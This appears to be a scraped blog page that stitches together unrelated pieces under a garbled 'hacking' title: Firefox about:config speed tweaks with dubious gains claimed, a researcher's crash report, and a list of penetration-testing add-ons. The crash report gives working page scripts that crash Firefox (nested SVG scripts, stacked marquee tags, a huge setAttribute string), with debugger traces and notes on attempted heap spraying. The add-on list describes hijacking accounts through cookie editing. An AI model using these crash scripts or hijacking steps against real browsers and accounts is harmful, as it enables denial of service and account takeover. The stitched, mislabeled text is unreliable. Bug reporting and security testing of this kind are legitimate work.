C-T-H

// // Leave a Comment

How To Hacking through Mozila Firefox Addons Tools Extenstion Plugins Update

Mozilla's Firefox browser is good. With a little minor "tweaking", however, you can make Firefox perform up to 40% faster for page transfers. With just a few clicks and some typing, you can experience faster browsing and surfing Firefox. Read below for how.

Here's How:

    Open the Firefox "config" page: click into the Firefox address location bar, and type about:config, press Enter.

    The "Config" file will appear in the Firefox browser as a page with hundreds of lines of code in it. Now, we start by enabling some advanced tabbed options:

    Locate the line browser.tabs.showSingleWindowModePrefs . (tip: press "b" on your keyboard to quick scroll).

    Double click on browser.tabs.showSingleWindowModePrefs . This will set its toggle to "true". Now your advanced and enhanced tabbing should be set.

    Note: in Firefox version 1.5, the command line is singlewindow.openintabs.
    Next: we will increase the "pipeline" RAM ability for Firefox to accomodate more packet transfer. In the same config document, scroll down to the line that says network.http.pipelining . Double click this line to set it to "true".

    Lastly, we will increase the maximum pipeline requests to 100. Find the line that says network.http.pipelining.maxrequests. Double click on it, and a dialog box will pop up. Change the setting from 4 to 100.

    No need to save this file. Simply close and restart Firefox, and you should see an immediate 10% to 40% increase in web page transfer speed, and faster opening of your tabbed windows! Enjoy!




Firefox has been outperforming IE in every department for years, and version 3 is speedier than ever.

But tweak the right settings and you could make it faster still, more than doubling your speed in some situations, all for about five minutes work and for the cost of precisely nothing at all. Here's what you need to do.

1. Enable pipelining

Browsers are normally very polite, sending a request to a server then waiting for a response before continuing. Pipelining is a more aggressive technique that lets them send multiple requests before any responses are received, often reducing page download times. To enable it, type about:config in the address bar, double-click network.http.pipelining and network.http.proxy.pipelining so their values are set to true, then double-click network.http.pipelining.maxrequests and set this to 8.

Keep in mind that some servers don't support pipelining, though, and if you regularly visit a lot of these then the tweak can actually reduce performance. Set network.http.pipelining and network.http.proxy.pipelining to false again if you have any problems.

2. Render quickly

Large, complex web pages can take a while to download. Firefox doesn't want to keep you waiting, so by default will display what it's received so far every 0.12 seconds (the "content notify interval"). While this helps the browser feel snappy, frequent redraws increase the total page load time, so a longer content notify interval will improve performance.

Type about:config and press [Enter], then right-click (Apple users ctrl-click) somewhere in the window and select New > Integer. Type content.notify.interval as your preference name, click OK, enter 500000 (that's five hundred thousand, not fifty thousand) and click OK again.

Right-click again in the window and select New > Boolean. This time create a value called content.notify.ontimer and set it to True to finish the job.

3. Faster loading

If you haven't moved your mouse or touched the keyboard for 0.75 seconds (the content switch threshold) then Firefox enters a low frequency interrupt mode, which means its interface becomes less responsive but your page loads more quickly. Reducing the content switch threshold can improve performance, then, and it only takes a moment.

Type about:config and press [Enter], right-click in the window and select New > Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a second) and click OK to finish.

4. No interruptions

You can take the last step even further by telling Firefox to ignore user interface events altogether until the current page has been downloaded. This is a little drastic as Firefox could remain unresponsive for quite some time, but try this and see how it works for you.

Type about:config, press [Enter], right-click in the window and select New > Boolean. Type content.interrupt.parsing, click OK, set the value to False and click OK.

5. Block Flash

Intrusive Flash animations are everywhere, popping up over the content you actually want to read and slowing down your browsing. Fortunately there's a very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and it'll block all Flash applets from loading, so web pages will display much more quickly. And if you discover some Flash content that isn't entirely useless, just click its placeholder to download and view the applet as normal.



6. Increase the cache size

As you browse the web so Firefox stores site images and scripts in a local memory cache, where they can be speedily retrieved if you revisit the same page. If you have plenty of RAM (2 GB of more), leave Firefox running all the time and regularly return to pages then you can improve performance by increasing this cache size. Type about:config and press [Enter], then right-click anywhere in the window and select New > Integer. Type browser.cache.memory.capacity, click OK, enter 65536 and click OK, then restart your browser to get the new, larger cache.

7. Enable TraceMonkey

TraceMonkey is a new Firefox feature that converts slow Javascript into super-speedy x86 code, and so lets it run some functions anything up to 20 times faster than the current version. It's still buggy so isn't available in the regular Firefox download yet, but if you're willing to risk the odd crash or two then there's an easy way to try it out.

Install the latest nightly build (ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/), launch it, type about:config in the address bar and press Enter. Type JIT in the filter box, then double-click javascript.options.jit.chrome and javascript.options.jit.content to change their values to true, and that's it - you're running the fastest Firefox Javascript engine ever.

8. Compress data

If you've a slow internet connection then it may feel like you'll never get Firefox to perform properly, but that's not necessarily true. Install toonel.net (toonel.net) and this clever Java applet will re-route your web traffic through its own server, compressing it at the same time, so there's much less to download. And it can even compress JPEGs by allowing you to reduce their quality. This all helps to cut your data transfer, useful if you're on a limited 1 GB-per-month account, and can at best double your browsing performance.



I was playing with Firefox to see what crashes it and thought SVG might be a good place to look. I tried combinations of all elements nested together and came across problems with script.

<script>str='';for(i=0;i<0xefff;i++){str+='<script>AAAAAA';};document.write('<svg>'+str+'</svg>');</script>

This causes a complete crash in Firefox but is it only a DoS? It appears so. I booted up windbg…stack overflow push edi.

FragmentOrElement::SaveSubtreeState()
{
uint32_t i, count = mAttrsAndChildren.ChildCount();//this line overflows
for (i = 0; i < count; ++i) {
mAttrsAndChildren.ChildAt(i)->SaveSubtreeState();
}
}

Looks like a DoS to me, it crashes inconstantly but more consistently if you increase the value maybe if it was debugged when it doesn’t crash there might be something more interesting but I failed so I’m posting here.
DoS by Marquee

I looked outside of SVG and our old friend marquee had some fun for us.

<script>document.write(Array(184).join('<marquee>'))</script>

This causes the marquee crash

if (aIID.Equals(kThisImplCID))
foundInterface = static_cast(this);
else
NS_INTERFACE_MAP_END//appears to be this line

eax=70339e24 ebx=00000000 ecx=70b4d320 edx=70d9c4ac esi=0be7b004 edi=80000000
eip=6fe720c8 esp=00e63000 ebp=00e631dc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202

6fe720c8 56 push esi

Crashes Firefox again but plain old Stack Exhaustion DoS again.
Possible stack corruption in Firefox using setAttribute

Lastly a pretty interesting crash that I reported to Mozilla which Boris stated it was safely crashing but in windbg there were a few indications of stack corruption and I was hoping to learn more when I reported it. I didn’t :/ so if you have some success please let me know as I was trying for ages. Here is my report to mozilla:

Here is a possible stack corruption in Firefox that’s I’ve been trying to exploit for a few days and I’ve finally given in and reported it. I would be super grateful to anyone who is willing to explain where I’m going right/wrong with this as I want to learn more about exploiting these bugs and also help mozilla in the process.

PoC
* Note if you increase the value to 0xfffff and more you can get outside of mozalloc and into non mozilla code.

Enough blabber. Ok so Firefox seems to crash when using setAttribute on
various html elements with a large selection of attributes. I couldn’t
narrow down exactly which are causing the problem but it could be just
having a lot of attributes. Passing a large string triggers the crash.

Exception Faulting Address: 0×74111988
First Chance Exception Type: STATUS_BREAKPOINT (0×80000003)

Faulting Instruction:74111988 int 3

Basic Block:
74111988 int 3

Exception Hash (Major/Minor): 0x142182e0.0x360c07ce

Hash Usage : Stack Trace:
Major+Minor : mozalloc!mozalloc_abort+0x2b
Major+Minor : xul!NS_DebugBreak_P+0x1c0
Major+Minor : xul!xpc::CompartmentPrivate::SetLocation+0x3fdf42
Major+Minor : xul!`anonymous namespace’::VirtualAllocHook+0x3f
Major+Minor : mozglue!chunk_alloc_mmap+0×17
Minor : MSVCR100!_getptd_noexit+0×74
Minor : MSVCR100!_errno+0×5
Minor : mozglue!je_malloc+0×369
Minor : xul!mozilla::dom::Element::SetAttr+0x5e2
Minor : xul!nsGenericHTMLElement::SetAttr+0x7a
Minor : xul!nsGenericHTMLFrameElement::SetAttr+0x1c
Minor : xul!mozilla::dom::Element::SetAttribute+0x1bd
Minor : xul!mozilla::dom::ElementBinding::setAttribute+0xa9
Minor : xul!mozilla::dom::ElementBinding::genericMethod+0×85
Minor : mozjs!js::mjit::EnterMethodJIT+0xbf
Minor : mozjs!CheckStackAndEnterMethodJIT+0×93
Minor : mozjs!js::Interpret+0x63bf
Minor : mozjs!js::RunScript+0xac
Minor : mozjs!js::ExecuteKernel+0×163
Minor : mozjs!js::Execute+0×83
Minor : mozjs!JS::Evaluate+0xd6
Minor : xul!nsJSContext::EvaluateString+0x20b
Minor : mozjs!JS::CompileOptions::CompileOptions+0×26
Minor : xul!nsQueryReferent::operator()+0×30
Minor : xul!nsCOMPtr_base::~nsCOMPtr_base+0xe
Minor : xul!nsIScriptElement::BeginEvaluating+0x3f
Minor : xul!nsScriptLoader::ProcessRequest+0x12f
Minor : xul!nsScriptLoader::ProcessScriptElement+0×251
Minor : xul!nsScriptElement::MaybeProcessScript+0xe5
Minor : xul!nsHtml5TreeOpExecutor::RunScript+0×60
Minor : xul!nsHtml5TreeOpExecutor::RunFlushLoop+0×314
Minor : xul!nsHtml5ExecutorFlusher::Run+0×14
Minor : xul!nsThread::ProcessNextEvent+0×279
Minor : xul!NS_ProcessNextEvent_P+0x2e
Minor : xul!mozilla::ipc::MessagePump::Run+0×46
Minor : xul!MessageLoop::RunHandler+0×51
Minor : xul!MessageLoop::Run+0×19
Minor : xul!nsBaseAppShell::Run+0x2c
Minor : xul!nsAppShell::Run+0×14
Minor : xul!XREMain::XRE_mainRun+0x37a
Minor : xul!XREMain::XRE_main+0xeb
Minor : xul!XRE_main+0×30
Minor : firefox!do_main+0x57e
Minor : firefox!wmain+0x7b0
Minor : firefox!__tmainCRTStartup+0×122
Minor : KERNEL32!BaseThreadInitThunk+0xe
Minor : ntdll!__RtlUserThreadStart+0×72
Minor : ntdll!_RtlUserThreadStart+0x1b
Instruction Address: 0×0000000074111988
Source File:
e:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\memory\mozalloc\mozalloc_abort.cpp
Source Line: 30

Description: Breakpoint
Short Description: Breakpoint
Exploitability Classification: UNKNOWN
Recommended Bug Title: Breakpoint starting at
mozalloc!mozalloc_abort+0x000000000000002b (Hash=0x142182e0.0x360c07ce)

What’s weird is that it hits a break point that I didn’t set. A software
breakpoint in Firefox maybe? And there’s indication of stack corruption
because symbols aren’t found. I mess around with this and it’s possible
to break out of the mozalloc into another handler (outside the mozilla
code) I’m assuming this is good because it gets to memory it shouldn’t.

I looked in the calls window in windbg and so this:
03 0114d71c 74a47107 xul!`anonymous namespace’::VirtualAllocHook(void *
aAddress = 0×41414141, unsigned long aSize = 0×41414141, unsigned long
aAllocationType = 0×41414141, unsigned long aProtect = 0×41414141)+0x3f
(FPO: [Non-Fpo]) (CONV: stdcall)

Which looks cool to me since my code seems to be controlling the address
but still no idea what do now. I tried heap spraying to 0c0c0c0c and
change the string I send to \u0c0c0c but with no success.

Increasing the size of the string to 0xffffff results in a different
handler being called (I’m assuming some ms dll).

Basic Block:
74aa2357 rep movs dword ptr es:[edi],dword ptr [esi]
Tainted Input operands: ‘ecx’,'edi’,'esi’
74aa2359 jmp dword ptr msvcr100!trailupvec (74aa2470)[edx*4]

Exception Hash (Major/Minor): 0x7bb0290d.0x5be6096d

Hash Usage : Stack Trace:
Major+Minor : MSVCR100!memmove+0×57
Major+Minor : xul!AtomImpl::AtomImpl+0×92
Major+Minor : xul!NS_NewAtom+0x8b
Major+Minor : xul!nsAttrValue::ParseAtomArray+0xa6
Major+Minor : xul!nsGenericHTMLElement::ParseAttribute+0x1b5
Minor : xul!nsHTMLIFrameElement::ParseAttribute+0×89
Instruction Address: 0x0000000074aa2357
Source File: f:\dd\vctools\crt_bld\SELF_X86\crt\src\Intel\MEMCPY.ASM
Source Line: 185

Description: User Mode Write AV near NULL
Short Description: WriteAVNearNull
Exploitability Classification: UNKNOWN
Recommended Bug Title: User Mode Write AV near NULL starting at
MSVCR100!memmove+0×0000000000000057 (Hash=0x7bb0290d.0x5be6096d)

User mode write access violations that are near NULL are unknown.



Firefox Add-ons for Security Researchers and Penetration Testers

    FoxyProxy Standard
    FoxyProxy is an advanced proxy management add-on for Firefox browser. It improves the built-in proxy capabilities of Firefox. There are few other similar kind of proxy management add-ons available, but it offers more features that other add-ons. Based on the URL patterns, it switches internet connection across one or more proxy servers. When proxy is in use, it also displays an animated icon. In case you want to see the proxies used by the tool, you can see the logs.

    Add FoxyProxy to you browser from this link: https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
    Firebug
    Firebug is a nice add-on that integrates a web development tool inside the browser. With this tool, you can edit and debug HTML, CSS and JavaScript live in any webpage to see the effect of changes. It helps in analyzing JS files to find XSS vulnerabilities. It’s an really helpful add-on in finding DOM based XSS for security testing professionals.Add Firebug in your Browser from this link: https://addons.mozilla.org/en-US/firefox/addon/firebug/
    Web Developer
    Web Developer is another nice add-on that adds various web development tools in the browser. It helps in web application penetration testing.Add Web Developer in your browser from this link: https://addons.mozilla.org/de/firefox/addon/web-developer/

    User Agent Switcher
    User Agent Switcher add-on; adds a one click user agent switch to the browser. It adds a menu and tool bar button in the browser. Whenever you want to switch the user agent, use the browser button. User Agent add on helps in spoofing the browser while performing some attacks.

    Add User Agent Switcher to your browser from this link: https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/
    Live HTTP Headers
    Live HTTP Headers is a really helpful penetration testing add-on for Firefox. It displays live headers of each http request and response. You can also save header information by clicking on the button in the lower left corner. I don’t think that there is any kind of need to tell how important this add-on is for the security testing process.Add Live HTTP Headers to Firefox with this link: https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

    Tamper Data
    Tamper Data is similar to the Live HTTP Header add-on but, has header editing capabilities. With the tamper data add-on, you can view and modify HTTP/HTTPS headers and post parameters. Thus it helps in security testing web application by modifying POST parameters. It can be used in performing XSS and SQL Injection attacks by modifying header data.Add the Tamper data add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

    Hackbar
    Hackbar is a simple penetration tool for Firefox. It helps in testing simple SQL injection and XSS holes. You cannot execute standard exploits but you can easily use it to test whether vulnerability exists or not. You can also manually submit form data with GET or POST requests. It also has encryption and encoding tools. Most of the times, this tool helps in testing XSS vulnerability with encoded XSS payloads. It also supports keyboard shortcuts to perform various tasks.I am sure, most of the persons in the security field already know about this tool. This tool is mostly used in finding POST XSS vulnerabilities because it can send POST data manually to any page you like. With the ability of manually sending POST form data, you can easily bypass client side validations of the page. If your payload is being encoded at client side, you can use an encoding tool to encode your payload and then perform the attack. If the application is vulnerable to the XSS, I am sure you will find the vulnerability with the help of the Hackbar add-on on Firefox browser.Add Hackbar add-on to Firefox browser with this link: https://addons.mozilla.org/en-US/firefox/addon/hackbar/
    Websecurify
    Websecurify is a nice penetration testing tool that is also available as add-on for Firefox. We have already covered WebSecurify in detail in previous article. WebSecurify can detect most common vulnerabilities in web applications. This tool can easily detect XSS, SQL injection and other web application vulnerability. Unlike other listed tools, it is a complete penetration testing tool in itself available as a browser add-on. It gives most of the features available in standalone tool.Add WebSecurify to Firefox browser with this link: https://addons.mozilla.org/en-us/firefox/addon/websecurify/

    Add N Edit Cookies
    “Add N Edit Cookies” is a cookie editing add-on that allows you to add and edit cookies data in your browser. With this tool, you can easily add session data manually in cookies. This tool is performed in session hijacking attack when you have the active cookies of the user. Edit your cookies to add the data and hijack the account.To download Add N Edit Cookies to Your Firefox browser: https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies-13793/

    XSS Me
    Cross Site Scripting is the most found web application vulnerability. For detecting XSS vulnerabilities in web applications, this add-on can be a useful tool. XSS-Me is used to find reflected XSS vulnerabilities from a browser. It scans all forms of the page, and then performs an attack on the selected pages with pre-defined XSS payloads. After the scan is complete, it lists all the pages that renders a payload on the page, and may be vulnerable to XSS attack. Now, you can manually test the web page to find whether the vulnerability exists or not.Add XSS Me
    to your Firefox browser: https://addons.mozilla.org/en-us/firefox/addon/xss-me/

    SQL Inject Me
    SQL Inject Me is another nice Firefox add-on used to find SQL injection vulnerabilities in web applications. This tool does not exploit the vulnerability but display that it exists. SQL injection is one of the most harmful web application vulnerabilities, it can allow attackers to view, modify, edit, add or delete records in a database.The tool sends escape strings through form fields, and tries to search database error messages. If it finds a database error message, it marks the page as vulnerable. QA testers can use this tool for SQL injection testing.Add SQL Inject Me
    add-on to your browser: https://addons.mozilla.org/en-us/firefox/addon/sql-inject-me/

    FlagFox
    FlagFox is another interesting add-on. Once installed in the browser, it displays the country’s flag to tell the location of the web server. It also comes with other tools like whois, WOT scorecard and ping.Add FlagFox in your browser: https://addons.mozilla.org/en-us/firefox/addon/flagfox/

    CryptoFox
    CryptoFox is an encryption or decryption tool for Mozilla Firefox. It supports most of the available encryption algorithm. So, you can easily encrypt or decrypt data with supported encryption algorithm. This add-on comes with dictionary attack support, to crack MD5 cracking passwords. Although, it hasn’t have good reviews, it works satisfactorily.Add CryptoFox add-on to your browser: https://addons.mozilla.org/en-US/firefox/addon/cryptofox/

    Access Me
    Access Me, is another add-on for security testing professionals. This add-on is developed by the company that works on XSS Me and SQL Inject Me. Access Me is the can Exploit-Me tool used for testing access vulnerabilities in web applications. This tool works by sending several versions of page requests. A request using the HTTP HEAD verb and a request using a made up SECCOM verb will be sent. A combination of session and HEAD/SECCOM will also be sent.Add Access Me to Firefox from this link: https://addons.mozilla.org/en-US/firefox/addon/access-me/

    SecurityFocus Vulnerabilities search plugin
    SecurityFocus Vulnerabilities search plugin, is not a security tool but a search plugin that lets users search for vulnerabilities from the Security Focus database.Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/securityfocus-vulnerabilities-/
    Packet Storm search plugin
    This is another search plugin that lets users search for tools and exploits from packetstormsecurity.org. The website offers free up-to-date security tools, exploits and advisories.Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/packet-storm-search-plugin/
    Offsec Exploit-db Search
    This is another plugin similar to the last two above. It also lets users search for vulnerabilities and exploits listed in exploit-db.com. This website is always up-to-date with latest exploits and vulnerability details.Add this to Firefox from the link: https://addons.mozilla.org/en-us/firefox/addon/offsec-exploit-db-search/
    Snort IDS Rule Search
    Snort IDS Rule Search is another search add-on for Firefox. It lets users search for Snort IDS rules on the snort.org website. Snort is the most widely deployed IDS/IPS technology worldwide. It’s an open source network Intrusion prevention and detection system with more than 400,000 users.Add Snort IDS Rule Search to Firefox here: https://addons.mozilla.org/en-US/firefox/addon/snort-ids-rule-search/

These are few add-ons that you can use while web application penetration testing. Although, you cannot finish complete penetration testing work with these tools, but these browser tools are useful for most of the tasks and reduce the use of separate tools.

Hackbar, SQL Inject Me, XSS Me and WebSecurity are the browser tools that are widely used for finding vulnerabilities in web applications. Other tools are used for specific work which helps in getting information while penetration testing.

Earn 25$ Instant